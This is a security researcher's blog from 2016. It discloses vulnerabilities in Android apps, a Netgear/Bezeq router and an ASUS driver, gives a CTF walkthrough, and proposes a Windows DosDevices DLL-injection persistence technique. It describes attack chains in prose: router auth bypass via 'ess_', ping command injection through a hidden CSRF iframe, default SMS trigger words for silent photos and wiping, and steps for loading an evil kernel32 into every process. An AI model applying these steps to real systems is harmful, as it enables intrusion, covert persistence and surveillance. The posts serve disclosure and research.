Saturday, July 9, 2016

Android attack surfaces - part II

Hello again,

Continuing our Android attack surfaces topic, today we'll discuss common network attacks.
The term "network attacks" is a huge topic, so, we'll just describe internet-based update mechanisms

The HTTP attack surface

HTTP is frequently used in modern Android apps.
Some of it is (quite) harmless, like presenting ads or viewing content, while other uses could be dangerous.
Particularly, using HTTP as an update mechanism could be fatal.
These are some common scenarios:

  1. Loading a DEX file (via DexClassLoader) downloaded from HTTP without validation.
  2. Extracting a ZIP received from HTTP without validation.
  3. Executing commands (via Runtime.exec) received from HTTP without validation.
  4. Executing binaries downloaded from HTTP without validation.
All of the above might result in a remote code execution. The important part (in my opinion) is the "validation" part: trusting plain HTTP is ill-advised.
Sometimes, the validation itself is broken. For example, validating a downloaded DEX file by comparing its SHA1 against a controllable SHA1 value (also downloaded from HTTP) isn't a great solution.
We'll discuss a simple scenario in which a rooted app downloads a binary file from HTTP without validating it:

The root browser app is a popular app designed to give rooted phones the easy ability to view or edit files as they wish (even in restricted parts such as the "/system" partition).

Busybox via HTTP

RootBrowser requires a special busybox to function. "busybox" is a binary file implementing many shell utilities, bundled together. When compiling, one can decide what utilities are required.
The busybox binary file itself is pretty easy to handle: just run the command line with the arguments. For example, to create a zip archive, run:
busybox zip file1 file2 file3
Usually, appropriate symlinks are installed s.t. one can invoke "zip file1 file2 file3".
Since RootBrowser cannot rely on the existence of a busybox on a vanilla system, it installs its very own busybox (yes, in the /system partition!).

So, what's so dangerous about busybox? busybox is EXTREMELY dangerous here, since:

  1. It is run from a rooted App, meaning that it is omnipotent (except SELinux rules, more on that in the upcoming posts).
  2. It might do malicious stuff. Can you completely trust the App developer?
  3. You have to understand where the busybox binary comes from.
Usually Android Apps can have assets. Assets are quite similar to resources, but unlike resources, they are not assigned an ID (which is then taken from a special class called R). All of the assets will reside in the sandbox folder of your App, inside "./assets".
Somehow, the App developer decided not to rely on assets (or on Google's App update mechanism?) and just decided to download the busybox from his own server. That server is simply HTTP.
Here is the relevant code (just look for "http://" references in the App itself):

The code gets a string ("asset name"), and checks if it exists or not. If it does not, it will download the asset from HTTP.
This means that an attacker with man-in-the-middle capabilities could attack a user to download an evil asset, which will be invoked later!
Since the App is rooted, the evil busybox could do (almost) whatever it wants.
For HTTP-MitM, one might use mitmproxy.


HTTP man-in-the-middle attacks are commonly overlooked, yet super-simple to exploit.
An App developer should never trust non-HTTPS communications.
Furthermore, root App developers should be extra careful, since a remote code execution on rooted Apps doesn't (mostly) require any privilege escalation.

Disclosure timeline

  • June 11th: discovered issues.
  • June 12th: contacted App developer.
  • June 12th: App developer replies that the new App is not ready yet, but will not download assets from HTTP.
  • June 13th: asked how much time it'll take to fix, App developer didn't respond.
  • July 2nd: App developer queried again, but failed to respond.
  • July 8th: App developer got his 3rd notice, but failed to respond.
  • July 9th: full disclosure.

Saturday, May 7, 2016

Android attack surfaces - part I


After some time, I've decided to talk about Android security and attack surfaces.
In the first part we'll introduce the fundamentals of Android, so feel free to skip it if you're proficient in Android security.

Android 101

Android is based on Linux OS, with some subtle modifications.
Here are some major security \ core OS concepts:

Apps and Dalvik

Android users often run Apps. These Apps might have several different system processes, but eventually are logically "linked" together. These apps are bundled in an archive (called an "APK").
The APK file has several interesting files \ directories in it:
  • AndroidManifest.xml - this is the App's metadata. It specifies the App's permissions (e.g. reading from the SD card or using the camera) and the App's entry points. An App can have multiple entry points - these are the common types:
    • Activity - the common entry point, anything that the user can act upon. From the GUI point-of-view, you can think of an activity as a form.
    • Service - a part of the App that can perform long-running operations in the background (e.g. playing music).
    • Content provider - anything that might provide content to other Apps. Android itself manages a few content providers of its own.
    • Broadcast receiver - anything that can get updated from a content provider.
  • classes.dex - this is where the magic happens. All of the code is bundled here. Android code is typically written in Java, but compiled to a special bytecode called "Dalvik" (or "ART" on newer platforms). Android's Java implementation is based on Apache Harmony.
  • META-INF: digital signatures on every file in the archive. Android security dictates that all Apps are digitally signed.
  • lib - where native libraries reside. Android permits coding libraries in C or C++ and invoking their code using JNI. Most App developers don't ship their native libraries, but some do - mostly for the sake of  performance or using closed libraries.

App permissions

As with every Linux machine, each file has permissions. These permissions specify the entities that are permitted to Read, Write or eXecute the file (hence the "rwx" abbreviation).
The entities themselves are the file's owner User, the file owner's Group and Others ("ugo").
The permissions themselves can be changed by invoking the chmod command.
Android itself creates a user for each application (in the Android terminology, an app has an Application ID or AID for short).
Most of the App's permissions (e.g. READ_EXTERNAL_STORAGE) are translated such that the App's "user ID" belongs to a specific group.
Of course, some changes were made in the kernel (e.g. enforcing that only Apps with specific permissions could open sockets).

IPC mechanisms

Another important concept of Android related to its IPC. Most of the traditional SysV IPC mechanisms are almost completely stripped. The IPC is implemented by a driver called "the binder".
There are many abstractions to invoking the binder, one of the most commonly used is an intent.
An intent could be sent from one App to another, from within an App to itself, or just to "anyone who matches a certain criteria". The former two are known as "explicit intents", and the latter is known as an "implicit intent".
Implicit intents are resolved by the concept of intent-filters, which are declared by an App in its manifest.


There are other notable security features that might interest us:
  • Android has embedded its own version of SE-linux (dubbed "SE-Android"). This means that even the root user isn't omnipotent anymore.
  • In Android, certain App permissions could only be bestowed upon "System Apps". These Apps are commonly pre-installed on the phone, and are installed at the "/system" partition (in opposed to user Apps that are installed at the "/data" partition). A fine example of such a permission is to quietly install a new App.
  • Android has full ASLR and DEP protections.

The SMS attack surface

So, this post we'll discuss the SMS attack surface. It is often overlooked, but interesting nonetheless.
We'll do this by example - let's examine a sample App. We'll focus on "Wheres My Droid" App. The App's main goal is to locate your phone in case you lost it. Note the App information and specifically, the number of installations:

Downloading the APK could be done in several ways:
  1. Getting the APK from the filesystem (could be done via ADB - thanks sergej a.k.a. winnie for the remark!).
  2. Performing MITM on the google Play services (requires installing a certificate).
  3. Downloading from 3rd parties who do these for you - for free.
I'm personally using the 3rd option (specifically,
After we've downloaded the APK, we should conduct some research. There are plenty of good tools out there:
  1. apktool - this great tool is used for translation of the AndroidManifest file to a human readable format, as well as translating the Java bytecode to SMALI code. It can also be used to repack an App.
  2. dex2jar - used to translate an APK's code to a JAR (losing data such as the Android manifest).
  3. jd-gui - a Java decompiler for our JAR.
  4. JEB - an all-in-one tool (not free).
Let's use apktool first:

Great, now let's examine the App's permissions in the manifest file:

Indeed, lot's of permissions! Note the RECEIVE_SMS permission - this is exactly our attack surface!
Exploring the manifest further reveals the following:

This defines a broadcast receiver which handles SMS messages.
Let's examine the receiver's code using dex2jar and jd-gui:

Many APKs use some kind of obfuscation, but this one doesn't. If you come across an obfuscated App, most of the classes will have names like "a", "b", "c" and the string will be nonexistent.
The onReceive method is the receiver's entry point, and it gets the SMS in the intent argument's "extra" member. Note that another intent is invoked for each message. The intent is sent to a service called "SMSHandlerService", with two extra fields: "FROM" and "MESSAGE".
So, let's examine the SMSHandlerService:

Examining checkAttrWord gives us the following (code snippet is trimmed):

So, what do we have?

  1. SMS message is intercepted to SMSReceiver's onReceive() method.
  2. SMS message is passed as an intent to SMSMessageHandler's onHandleIntent() method.
  3. According to the message's content, an action is performed. Supported actions:
    1. Upgrading App to the Pro version (hardcoded "wmdprounlock").
    2. Checking whether the App is installed (hardcoded "wmdinstalled").
    3. Ringing (from the App's context).
    4. Getting GPS coordinates.
    5. Taking a picture from the front or back camera.
    6. Locking or unlocking the phone.
    7. Wiping the phone's memory.
The codes for most of the features (e.g. getting the GPS info) are not hardcoded, but acquired from the App's shared preferences. However, there are default values, and the App doesn't force you to change them:
  • "WMD Ring" - ringing.
  • "WMD GPS" - getting GPS location.
  • "WMD Camera Front" and "WMD Camera Back" - taking silent photos from the camera.
  • "WMD Lock" and "WMD Unlock" - locking and unlocking the phone.
  • "WMD Wipe" - wiping the device.
These could all be acquired from the App's string resources (strings.xml):

Note some issues here though:
  1. Locking, unlocking and wiping the phone requires to be a "Device Administrator", which is not the default case.
  2. Except ringing and getting the GPS info, all actions require the pro version. This could easily be avoided by upgrading. Note that it's kind-of embarrassing - the App developers want an "in-App purchase" to upgrade, even though you can get it for free!
  3. The App lets you add a blacklist or a whitelist, but doesn't force you (this feature is turned off by default).
  4. The App lets you change the "attention words", but doesn't force you.
The result is returned via an SMS message to the sender.
Besides sending an SMS message, other Apps that are installed on the phone could cause damage as well.
In Android, Receives could be exported or internal. Here, the receivers are exported, which means that another App could forge an intent to make stuff on its behalf.
This is a very common bug: App developers must keep their activities and receivers private, and never count on the input that they receive!


Even though it's not a remote code execution, this very popular App lets you upgrade itself (with no extra charge), take silent pictures, get GPS info and even in some cases wipe the phone or unlock it!
The problem is that the App trusts the SMS message that it gets, without verification.

Disclosure timeline

  • April 20th, 2016: discovered issues.
  • April 21st, 2016: contacted App developers with no response.
  • May 1st, 2016: tried to contact App developers for the second time.
  • May 7th, 2016: public disclosure.

Saturday, March 26, 2016

BugSec challenge - walkthrough

In this post I'll write my own solution to BugSec's challenge.
This challenge appeared on November 2015 and can be found here.
Since a few months have passed, I think I can share my solution.

First analysis

So, downloading the RAR file exposes two files:
  • BugMe 0x01.exe - a normal 64-bit PE.
  • BugMe - a binary file (blob).
Running "BugMe 0x01.exe" results in the following output:

So, the next step is to understand what the EXE does. You can run tools like procmon to understand a little, but you'll resort to static analysis sooner or later.
Opening it with IDA reveals lots of interesting strings:

So, since we got the "Unable to open file" error, we'll look into that. It is referenced by function 0x140001220, which tries to open a file called "bs" (using fopen). It will present that error upon failure.
After a successful read, it seeks to the file's 3rd byte and compares to 0x47 ("G"). If the bytes are different, then another error is presented ("couldn't verify the file."). If it was successful, the function at 0x140001160 is invoked the FILE* as its sole argument:

At that point, we can quite safely assume that the executable checks the binary file's integrity.
Examining function 0x140001160 reveals a simple anti-debugging trick:

This looks for an "ollydbg" window. If found - it quits the process immediately.
Later on, that function reads the byte at offset 0x5F1A and compares it against 0x58 ("X"). If the comparison succeeds, we proceed to function 0x1400010C0.
Similarly, that function compares byte 0x271 to 0x55 ("U"), and continues to function 0x140001000.
The function at  0x140001000 compares byte 0x4656 to 0x48 ("H"), but does another basic anti-debugging trick:

The OutputDebugString function with "%s%s%s..." screws-up some debuggers (e.g. an old version of OllyDbg).
So, we're going to fix the binary blob as such:
  1. Rename it to "bs".
  2. Fix byte at offset 0x3 to 'G'.
  3. Fix byte at offset 0x5F1A to 'X'.
  4. Fix byte at offset 0x271 to 'U'.
  5. Fix byte at offset 0x4656 to 'H'.
After fixing all of these, we get a "reasonable" output:

And the "bs" file is revealed to be a PNG:

Blue pill? LSBs?

This is obviously a steganography challenge. "LSBs" must refer to Least Significant Bits, while "blue" must refer to the blue part in a pixel encoding (RGB). Trying to extract the LSBs of the blue parts might have led people to a valid solution, but at that time I couldn't have seen it.
Rethinking about LSBs got me thinking that LSB enhancing must have changed the background color in a way that is indistinguishable to the human eye.
I know that there are tools to do this, but I decided to just color the background in red. Examining the left column closer, reveals that there is encoded data there:

The left column contains 700 pixels, which isn't very good - if we're talking about standard LSB enhancing we ought to have a number that can be divided by 8. However, not all is lost - some encoding systems code a character using only 7 bits (e.g. 7-bit ASCII). So, let's try to extract the LSBs in the left-column and convert them to 7-bit ASCII characters:

And running it:

This is clearly the solution. Note that the suffix is encoded as 0xFF bytes, so you see these weird characters padded at the end.


This challenge was very fun and quite straightforward - no real tricks besides some basic anti-debugging tricks and some steganography.
If you solved this challenge using different methods - please share!

Sunday, March 20, 2016

Netgear's DGN2200 - multiple vulnerabilities

So, as a good 1st embedded-related post, I'd like to share some vulnerabilities I found on a firmware version for NetGear's DGN2200 router. Of course, it was all responsibly disclosed.
These vulnerabilities were found on a custom Bezeq firmware; however, they may reside in other Negear firmware.
I have to state that Bezeq responsibly cooporated and were in touch with me during the entire time.
As I said, these may still reside in Netgear firmware, even though Netgear didn't acknowledge.

Getting started

Like most routers, the DGN2200 allows HTTP administration. This is an appealing attack surface, and I'm going to examine it. Anyway, it's always a good idea to see if there are any more interesting services:
So, we have DNS, UPNP and HTTP. Although the DNS and UPNP might be interesting, we will first examine the HTTP.

Extracting the filesystem

The first thing we want to do is to download the firmware -- you can download it yourself from the official website. The next thing I'm going to do is to try and extract a filesystem from the firmware.
I'll use binwalk, which is a great tool designed especially for this:

Good, we found a JFFS2, a filesystem widely used in embedded solutions. If you have the firmware modification kit (FMK), it might mount your filesystem.
Alright, let's investigate the filesystem itself.

Where are my cgi files?

Normally, we'd like to examine the following:
1. Initialization scripts - usually they're in "/etc/init.d" or "etc/rc.d".
2. Configuration files - in "/etc/*.conf".
3. The "/www" directory.

Examining the /etc/init.d/rcS reveals nothing interesting - just mounting /proc, initialization of fstab, etc... Configuration files reveal nothing of interest either... So, it's time to examine the "/www" directory.

Once we examine files in this directory, we cannot find any cgi files, although the web interface uses them a lot! So, where are my cgi files?

Let's think about the HTTP interface: a process ("httpd") opened a listening socket on port 80, and serving requests. That process is responsible of serving the HTML files and the CGI, but there are no CGI files at all... So, let's examine the httpd itself:

So, the cgi files are probably "baked" into httpd. Further examination reveals HTML code inside the httpd image as well. So, our next step is to reverse-engineer chunks of the httpd!

Reversing httpd

The httpd image is a MIPS elf file. It can be easily parsed by IDA. Since we'd like to examine the authentication procedure, we'll look for interesting related strings. One is quickly found: "Authorization: Basic". This is used in basic HTTP authentication in which the username and the password are sent in Base64. Reversing some parts the enormous function that uses this string reveals some very interesting issues... Generally, what they do is the following:

At that point, "auth_blob" points to the base64 string in the HTTP header.
Basically, after decoding (in-place), the code finds a colon (which separates the username and the password), place a NULL terminator and uses strcpy to copy it to a global variable called USERNAME. That variable is a global array with a length of 0x14 bytes. This means that a long enough username could potentially corrupt memory by overriding other global variables!
Unfortunately, I didn't find any usable global variables later on, so I decided to remember that memory corruption thing and look elsewhere.

So, my second thought was: "what pages don't require authorization at all?". Finding the code that filters out pages that don't require authorization was easy, and revealed a second bug:
As you can see, the files "utility.js" and "browser.js" are compared against the requested file (which is referenced by the $a0 register), using strcmp (which is not so-safe, but whatever). However, the third block here reveals a serious problem - in order to filter-out every filename that has "ess_", the code uses strstr! This means that we can bypass authorization by adding another GET parameter to the URL!
This issue generally allows an attacker (from within the LAN) bypass all authorization, even if it changes from "Admin:Admin".

Extending our reach from within the LAN

So, what can an attacker do after bypassing authorization? A tempting thing to do would be to change the router's firmware - but it takes time, resets the router and therefore - not so stealthy. Can we run arbitrary commands on the router? Commands are usually carried out by invoking "system" - so let's look for xrefs! The first xref shows a promising result:
Basically, "ping -c 4 %s %s" is sent to sprintf with (hopefully) a controllable string, and the result is sent to the "system" API. Sniffing the ping utility to reveals a very simple structure: all parts are sent as variables (IPAddr1, IPAddr2 and so on), and there is another variable that contains the entire IP address (ping_IPAddr). So, assuming that ping_IPAddr is what's sent to the first "%s", we could try to use a pipe (|) to inject a command!
Let's try it now:

This should create a file called "pwned" in the /tmp directory. Debugging the router (using telnet from the LAN) proves our command injection works, as there is now a "pwned" file:
Combining this with our authorization bypass means that an attacker (from the LAN) can run arbitrary commands on the router, without authentication! Using Linux backticks (`) also works.
Another cool thing is to try and get an output from our commands. It seems that the ping command writes itself to "/tmp/diag.conf". Then, the CGI parses that file and displays its contents in the result. The CGI also looks for the word "PING" as its first word.
Our next target is to finish this off by extending our reach to the WAN.

Attack from the WAN

So, a user from the LAN can circumvent the router easily by doing a single HTTP request. Our goal is to make someone do that for us - while we're in the WAN.
Let's assume that our victim is behind the router, and doing some HTTP traffic. Let's also assume that we're the man-in-the-middle (MITM) between the router and the desired HTTP server. Since the victim is definitely in the LAN, and since we're MITM - we can inject code to the response HTML code (e.g. via an iframe) that would make the victim's browser send another HTTP request!
That kind of attack is called CSRF, and our router is vulnerable to it, This is it - assuming HTTP MITM, we can successfully run an arbitrary command on the victim's router!

Combining the pieces + exploit code

This is the complete attack scenario:
1. Victim is behind the router, and surfs to an HTTP server.
2. Attacker modifies the server's response and injects a hidden IFRAME (of size 1x1, etc...).
3. IFRAME's src attribute is: "|command".
4. Note that we've combined authorization bypass and the command injection.
5. Victim's browser parses result and sends another HTTP request, this time to the router.
6. Since the victim is in the LAN, router responds to HTTP requests (via the httpd process).
7. Due to "ess_", httpd skips authorization.
8. Due to command injection, httpd runs arbitrary command.

So, I've written an exploit code (HTML file) that creates an arbitrary file on the router's filesystem and opens telnetd.
My POC can be found here:


In this post, we've seen the following issues:
1. Authentication bypass vulnerability from the LAN.
2. A possible memory corruption from the LAN whilst authenticating.
3. CSRF vulnerability.
4. Command injection via the ping tool.

These could be easily avoided by firmware vendors, especially the first two issues that are caused by unsafe libc functions - strstr and strcpy. Command injection could also be easily avoided by sanitizing the user's input! Avoiding CSRF is also a common practice.

Anyway, by applying HTTP MITM an attacker could run commands on the victim's router, remotely and silently. This could lead to a nice grip on the victim's network, and potentially attack the victim's machines (can you think of creative ways?).

Disclosure timeline

  • February 10th, 2016: discovered 3 issues: memory corruption, authorization bypass, CSRF.
  • February 10th, 2016; supplying technical details to Netgear, including POC code.
  • February 12th, 2016: Netgear's response - they said that only the Bezeq firmware is vulneable.
  • February 13th, 2016: discovering command injection vulnerability, updating Netgear.
  • February 14th, 2016: contacted Bezeq.
  • February 21st, 2016: Bezeq acknowledged.
  • March 3rd, 2016: Bezeq's firsty hotfix to authorization bypass vulnerability.
  • March 20th, 2016: disclosure, assigned DWF-2016-91000.

Saturday, March 19, 2016

Injection via DosDevices


In this post I'll propose a novel persistent injection method for Windows.
As far as I know, it has not been implemented before.
The goal would be to covertly inject a DLL to (almost) every userland process.
So, let's get down to business!


It all began when I first encountered the subst command. To those who are unfamiliar - it allows one to create a virtual drive and map it to an arbitrary path. Some reading exposed that it uses the "DefineDosDevice" WinAPI, which is great.
Furthermore, it is documented that you can make these virtual drives persist between reboots by registering entries in the registry. Here's Wikipedia's entry on this subject:

"... with a registry modification it is possible to assign a path to a drive letter during startup so it is available to system services and persists across a reboot.
Create a new registry entry "String Value" in the following key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices
The name should be  "X:"  where X is the drive letter".

Well, since I wanted to have a persistent drive "T:" for my temporary files, I did just that.
Surprisingly, I found that there are already some entries in the registry:

These entries come with a clean installation, and are used for backward compatibility, as well as maintaining helpful symbolic links (e.g. NUL). Using winobj, you can see that all of these are indeed symbolic links (under "GLOBAL??"):

Can you see the "AUX" and "PIPE" there? These are taken from the DosDevices registry key.
What about "C:"? Did you know that your drive letters are in-fact, symbolic links?
So, our goal would be to take advantage of the fact that symbolic links are mapped from the DosDevices registry key. Our next goal is to understand who maps these symlinks.


According to documentation, the process who's in-charge of these mappings is smss.exe. This is done quite early in the boot sequence, which makes sense - most processes might need these symbolic links!
My first idea was to override "C:" and see what happens - it wrecked havoc on my VM - an endless BSOD... At that point, it was clear we'll have to understand the entire boot sequence starting smss.exe.
So, what does smss.exe do? This process is the "Session Manager SubSystem" (hence "smss"), and it's responsible for plenty of usermode global initializations, such as creating environment variables, initializing csrss.exe, create pagefiles, etc...
It's also responsible for two major features, which we're going to abuse:

  1. Create DOS device mappings (via symbolic links), as we've discussed.
  2. Map the known DLLs.

So, we've already talked about the DOS device mappings, but what about "known DLLs"?
Well, "known DLLs" is a mechanism which improves performance of DLL loading to new processes. For example, when a process starts, it will probably load some common DLLs (e.g. kernel32, user32, etc...). So, instead of reading them from the disk each time (by the Windows loader), they could be mapped as global sections and loaded from memory. The Windows loader maps these sections to the new process, which lessens IO overhead.
The known DLLs reside in HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs. The default folder for the known DLLs themselves resides in a value called "DllDirectory", and by default it's "%Systemroot%\system32". Also, by default, only "TrustedInstaller" can change these values.
Luckily, %Systemroot% is translated to "C:\Windows" (assuming C: is our system partition), so known DLLs will get loaded from "C:\Windows\System32"...
Also, it appears that smss.exe maps these DLLs only after creating the symbolic links!
Furthermore, it appears that the only job that smss does between the DOS devices mappings and handling known DLLs is file renaming operations (via kernel32!MoveFileEx), which has no dire consequences:

Putting it all together

So, let's assume that we have a machine with (at least) two partitions:

  • C: - the system partition. It is mapped as "\Device\HarddiskVolume1".
  • D: - another partition. It is mapped as "\Device\HarddiskVolume2".
An attacker could do the following:
  1. Create a "hidden" folder in "D:\Whatever\Evil\Windows\System32".
  2. Write an "evil" kernel32 and place it in that folder.
  3. Register a symbolic link that maps "C:" to "\Device\HarddiskVolume2".
  4. In order to survive, the first thing that the evil kernel32's DllMain does it to remap the symbolic link of "C:" back to "\Device\HarddiskVolume1". This is done by invoking the DefineDosDevice API.
Since our evil kernel32 is now mapped as a known DLL, we're injected to each and every userland process for free!
We're also able to persist (i.e. survive reboots), in a manner that tools like autoruns are unaware of.

Thursday, March 17, 2016

Bloatware considered harmful

Hi again,

So, this time I plan to reverse some Windows "bloatware". Microsoft has really improved their software's security and robustness; however, 3rd party vendors have not.
This time I'm going to focus on an ASUS service.

Hello atkex

The "atkexsvc.exe" process really got my attention. Being a signed service that runs under WOW64 makes it stand out like a sore thumb.
Looking for interesting strings revealed that it probably has some modules written in Borland Delphi (FastMM). This is particularly interesting because it tries to side-load a very special DLL which is in charge of memory allocation:

This is indirectly called from every allocation \ deallocation, which is kind of nice. However, that's not my main focus today.
Examining this process with Process Explorer reveals a very interesting DLL:

Purple means a "packed image". Why would an ASUS DLL be packed? In my opinion, packed packages often reveal nice surprises. The packing was kind of standard:

Unpacking revealed lots of strings that seem to handle "CPU voltage", "Physical core selection" and so on.
There are plenty of subroutines, most of them look quite similar... The most interesting part was the DLL's import table, which referred to a dll called "ASIO" with plenty of interesting functions:

Well, "ASIO_WriteMSR", here we come!

MSRs 101

In Intel architecture, MSRs are "Model Specific Registers".
These are registers that contain various data which is... Well... Model specific!
They are described in Intel 64 and IA-32 architectures software developer's manual, and contain a lot of information.
MSRs are read using a privileged instruction called "rdmsr", and written to by invoking "wrmsr". These instructions could only be invoked from ring0 (Kernel mode).
This means that there is a driver which serves those requests by the ASIO DLL. Does that device verify its input?
So, the first thing we have to do is reverse ASIO DLL.
Surprisingly, it's not packed, and written in C. It contains interesting exports like "OC_GetCurrentCPUFrequency", "GetPortVal", etc...
Understanding the structure of the input and output buffers that are sent to the IOCTL to the driver was trivial:

The real question is - whether the driver validates MSR values...
We can do it by either reversing, or just trial and error... By reversing:

As you can clearly see, the driver does not validate anything. Same thing happens in other functions.
Understanding the structure of the MSR requests, I build as Python script to do the same as ASIO does. Trying it out gives as satisfying results.
Of course, the driver is signed (note the interesting path for a x64 driver):


So, what can we do if we can access MSRs?
A very interesting MSR (on x64) is the IA32_LSTAR (0xC0000082). It points to the function that is supposed to get executed whenever SYSENTER is invoked (this is the value that RIP gets). Naturally, the kernel sets it up to KiSystemCall64. There are other MSRs that set the CS and RSP registers as well.
As a proof of concept to an information leak, you can take the Python script and do the following:

Note the printed address. After a reboot, the result might be different.
What else can we do? Another cool MSR to override is the IA32_EFER (0xC0000080). It contains configuration flags, bit #11 controls whether DEP is enforced. If we could write on that MSR - we could prevent DEP mitigation!
However, things are not so simple, as Windows Patch Guard kicks in and prevents us from modifying certain MSRs. This, however, works on older Windows versions.
Anyway, POC code can be found here:

Disclosure timeline

  • March 4th, 2016: contacted AsusTEK via mail and online chat. AsusTEK blamed it on Microsoft!
  • March 5th, 2016: contacted the Microsoft security response center.
  • March 10th, 2016: Microsoft acknowledged and asked AsusTEK to fix.
  • March 16th, 2016: AsusTEK refuse to admit their mistakes.
  • March 17th, 2016: public disclosure, assigned DWF-2016-91001.